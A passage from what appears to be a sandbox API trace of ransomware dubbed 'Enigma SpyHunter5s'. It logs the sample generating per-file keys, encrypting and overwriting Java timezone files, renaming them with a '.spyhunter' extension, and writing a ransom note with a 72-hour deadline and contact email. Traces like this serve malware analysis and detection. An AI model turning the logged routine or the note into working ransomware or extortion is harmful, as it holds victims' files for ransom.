[0168.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.792] GetProcessHeap () returned 0x2c0000 [0168.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0168.792] GetProcessHeap () returned 0x2c0000 [0168.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebd940 | out: hHeap=0x2c0000) returned 1 [0168.792] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e688 | out: pbBuffer=0x57e688) returned 1 [0168.792] GetProcessHeap () returned 0x2c0000 [0168.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0168.792] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e680*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e680*=0x30) returned 1 [0168.792] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+9" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0168.817] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+9") returned 53 [0168.818] StrStrW (lpFirst="GMT+9", lpSrch=".txt") returned 0x0 [0168.818] GetProcessHeap () returned 0x2c0000 [0168.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0168.818] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e644, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e644*=0x1b, lpOverlapped=0x0) returned 1 [0168.818] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.818] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x57e644, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e644*=0x1b, lpOverlapped=0x0) returned 1 [0168.819] GetProcessHeap () returned 0x2c0000 [0168.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0168.819] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.819] WriteFile (in: hFile=0xa0, lpBuffer=0x57e684*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e644, lpOverlapped=0x0 | out: lpBuffer=0x57e684*, lpNumberOfBytesWritten=0x57e644*=0x4, lpOverlapped=0x0) returned 1 [0168.819] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e644, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e644*=0x30, lpOverlapped=0x0) returned 1 [0168.819] CloseHandle (hObject=0xa0) returned 1 [0168.819] GetProcessHeap () returned 0x2c0000 [0168.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.819] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+9.spyhunter") returned 63 [0168.819] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+9" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+9"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+9.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+9.spyhunter")) returned 1 [0168.820] GetProcessHeap () returned 0x2c0000 [0168.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.820] GetProcessHeap () returned 0x2c0000 [0168.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0168.820] GetProcessHeap () returned 0x2c0000 [0168.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f28568 | out: hHeap=0x2c0000) returned 1 [0168.820] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e688 | out: pbBuffer=0x57e688) returned 1 [0168.820] GetProcessHeap () returned 0x2c0000 [0168.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0168.820] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e680*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e680*=0x30) returned 1 [0168.820] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+12" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+12"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0168.821] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+12") returned 54 [0168.821] StrStrW (lpFirst="GMT+12", lpSrch=".txt") returned 0x0 [0168.821] GetProcessHeap () returned 0x2c0000 [0168.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0168.821] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e644, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e644*=0x1b, lpOverlapped=0x0) returned 1 [0168.821] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.822] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x57e644, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e644*=0x1b, lpOverlapped=0x0) returned 1 [0168.822] GetProcessHeap () returned 0x2c0000 [0168.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0168.822] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.822] WriteFile (in: hFile=0xa0, lpBuffer=0x57e684*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e644, lpOverlapped=0x0 | out: lpBuffer=0x57e684*, lpNumberOfBytesWritten=0x57e644*=0x4, lpOverlapped=0x0) returned 1 [0168.822] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e644, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e644*=0x30, lpOverlapped=0x0) returned 1 [0168.822] CloseHandle (hObject=0xa0) returned 1 [0168.822] GetProcessHeap () returned 0x2c0000 [0168.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.822] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+12.spyhunter") returned 64 [0168.822] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+12" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+12"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+12.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+12.spyhunter")) returned 1 [0168.823] GetProcessHeap () returned 0x2c0000 [0168.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.823] GetProcessHeap () returned 0x2c0000 [0168.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0168.823] GetProcessHeap () returned 0x2c0000 [0168.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f27fa8 | out: hHeap=0x2c0000) returned 1 [0168.823] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e680 | out: pbBuffer=0x57e680) returned 1 [0168.823] GetProcessHeap () returned 0x2c0000 [0168.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0168.823] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e678*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e678*=0x30) returned 1 [0168.823] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+11" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+11"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0168.824] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+11") returned 54 [0168.824] StrStrW (lpFirst="GMT+11", lpSrch=".txt") returned 0x0 [0168.824] GetProcessHeap () returned 0x2c0000 [0168.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0168.824] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e63c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e63c*=0x1b, lpOverlapped=0x0) returned 1 [0168.825] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.825] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x57e63c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e63c*=0x1b, lpOverlapped=0x0) returned 1 [0168.825] GetProcessHeap () returned 0x2c0000 [0168.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0168.825] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.825] WriteFile (in: hFile=0xa0, lpBuffer=0x57e67c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e63c, lpOverlapped=0x0 | out: lpBuffer=0x57e67c*, lpNumberOfBytesWritten=0x57e63c*=0x4, lpOverlapped=0x0) returned 1 [0168.825] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e63c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e63c*=0x30, lpOverlapped=0x0) returned 1 [0168.825] CloseHandle (hObject=0xa0) returned 1 [0168.825] GetProcessHeap () returned 0x2c0000 [0168.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.825] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+11.spyhunter") returned 64 [0168.825] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+11" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+11"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+11.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+11.spyhunter")) returned 1 [0168.826] GetProcessHeap () returned 0x2c0000 [0168.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.826] GetProcessHeap () returned 0x2c0000 [0168.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0168.826] GetProcessHeap () returned 0x2c0000 [0168.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f27ef0 | out: hHeap=0x2c0000) returned 1 [0168.826] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e680 | out: pbBuffer=0x57e680) returned 1 [0168.826] GetProcessHeap () returned 0x2c0000 [0168.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0168.826] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e678*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e678*=0x30) returned 1 [0168.826] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+10" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+10"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0168.827] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+10") returned 54 [0168.827] StrStrW (lpFirst="GMT+10", lpSrch=".txt") returned 0x0 [0168.827] GetProcessHeap () returned 0x2c0000 [0168.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0168.827] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e63c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e63c*=0x1b, lpOverlapped=0x0) returned 1 [0168.828] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.828] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x57e63c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e63c*=0x1b, lpOverlapped=0x0) returned 1 [0168.828] GetProcessHeap () returned 0x2c0000 [0168.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0168.828] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.828] WriteFile (in: hFile=0xa0, lpBuffer=0x57e67c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e63c, lpOverlapped=0x0 | out: lpBuffer=0x57e67c*, lpNumberOfBytesWritten=0x57e63c*=0x4, lpOverlapped=0x0) returned 1 [0168.828] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e63c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e63c*=0x30, lpOverlapped=0x0) returned 1 [0168.828] CloseHandle (hObject=0xa0) returned 1 [0168.829] GetProcessHeap () returned 0x2c0000 [0168.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.829] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+10.spyhunter") returned 64 [0168.829] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+10" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+10"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+10.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+10.spyhunter")) returned 1 [0168.829] GetProcessHeap () returned 0x2c0000 [0168.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.829] GetProcessHeap () returned 0x2c0000 [0168.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0168.830] GetProcessHeap () returned 0x2c0000 [0168.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f27e38 | out: hHeap=0x2c0000) returned 1 [0168.830] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e678 | out: pbBuffer=0x57e678) returned 1 [0168.830] GetProcessHeap () returned 0x2c0000 [0168.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0168.830] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e670*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e670*=0x30) returned 1 [0168.830] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+1" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0168.830] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+1") returned 53 [0168.830] StrStrW (lpFirst="GMT+1", lpSrch=".txt") returned 0x0 [0168.830] GetProcessHeap () returned 0x2c0000 [0168.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0168.830] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e634, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e634*=0x1b, lpOverlapped=0x0) returned 1 [0168.831] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.831] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x57e634, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e634*=0x1b, lpOverlapped=0x0) returned 1 [0168.831] GetProcessHeap () returned 0x2c0000 [0168.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0168.831] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.831] WriteFile (in: hFile=0xa0, lpBuffer=0x57e674*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e634, lpOverlapped=0x0 | out: lpBuffer=0x57e674*, lpNumberOfBytesWritten=0x57e634*=0x4, lpOverlapped=0x0) returned 1 [0168.831] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e634, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e634*=0x30, lpOverlapped=0x0) returned 1 [0168.832] CloseHandle (hObject=0xa0) returned 1 [0168.832] GetProcessHeap () returned 0x2c0000 [0168.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.832] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+1.spyhunter") returned 63 [0168.832] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+1" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+1"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+1.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+1.spyhunter")) returned 1 [0168.832] GetProcessHeap () returned 0x2c0000 [0168.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.832] GetProcessHeap () returned 0x2c0000 [0168.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0168.832] GetProcessHeap () returned 0x2c0000 [0168.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f27d80 | out: hHeap=0x2c0000) returned 1 [0168.833] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e678 | out: pbBuffer=0x57e678) returned 1 [0168.833] GetProcessHeap () returned 0x2c0000 [0168.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0168.833] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e670*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e670*=0x30) returned 1 [0168.833] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0168.834] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT") returned 51 [0168.834] StrStrW (lpFirst="GMT", lpSrch=".txt") returned 0x0 [0168.834] GetProcessHeap () returned 0x2c0000 [0168.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0168.834] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e634, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e634*=0x1b, lpOverlapped=0x0) returned 1 [0168.834] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.834] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x57e634, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e634*=0x1b, lpOverlapped=0x0) returned 1 [0168.835] GetProcessHeap () returned 0x2c0000 [0168.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0168.835] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.835] WriteFile (in: hFile=0xa0, lpBuffer=0x57e674*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e634, lpOverlapped=0x0 | out: lpBuffer=0x57e674*, lpNumberOfBytesWritten=0x57e634*=0x4, lpOverlapped=0x0) returned 1 [0168.835] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e634, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e634*=0x30, lpOverlapped=0x0) returned 1 [0168.835] CloseHandle (hObject=0xa0) returned 1 [0168.835] GetProcessHeap () returned 0x2c0000 [0168.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.835] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT.spyhunter") returned 61 [0168.835] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt.spyhunter")) returned 1 [0168.836] GetProcessHeap () returned 0x2c0000 [0168.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.836] GetProcessHeap () returned 0x2c0000 [0168.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0168.850] GetProcessHeap () returned 0x2c0000 [0168.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebe5c0 | out: hHeap=0x2c0000) returned 1 [0168.850] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0168.851] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0168.851] WriteFile (in: hFile=0xa0, lpBuffer=0x57e5a7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e6d0, lpOverlapped=0x0 | out: lpBuffer=0x57e5a7*, lpNumberOfBytesWritten=0x57e6d0*=0x127, lpOverlapped=0x0) returned 1 [0168.852] lstrlenA 